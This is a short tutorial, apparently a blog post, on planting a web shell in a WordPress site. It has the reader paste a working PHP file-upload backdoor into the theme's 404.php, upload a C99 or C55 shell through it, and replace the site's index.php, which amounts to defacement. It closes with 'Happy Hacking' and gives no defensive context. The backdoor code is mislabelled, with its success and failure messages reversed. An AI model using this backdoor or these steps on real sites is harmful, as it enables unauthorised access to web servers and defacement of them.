How To Upload Shell To Wordpress And gain access to it?

Wordpress hacking is basically harder. If somehow you can upload a shell, the entire task become easier. As shell i like C99. Shell is something virus type file that make a web server vulnerable to hack. Now learn how to upload shell to Wordpress

Shell Upload In Wordpress

Go to Wordpress Dashboard → Appearance → Editor

Now Open the 404.Php file. copy the code and paste the following code just opening of the file

<?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) {  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>credits : www.edutechnology.net</b><br><br>'; }  else { echo '<b>Upload Sucess !!!</b><br><br>'; } } ?>

Now save the file

Now go to http://www.site.com/wp-content/themes/themename/yourshellfile.php

You will see a shell upload tab

If you access a 404 error page, you will also see that upload tab

Now Upload c99 or c55 shell

Afterwards chnage the index.php file in public_html using shell

Happy Hacking :P

Enjoyed the article ? Please share if you like. Thank you for reading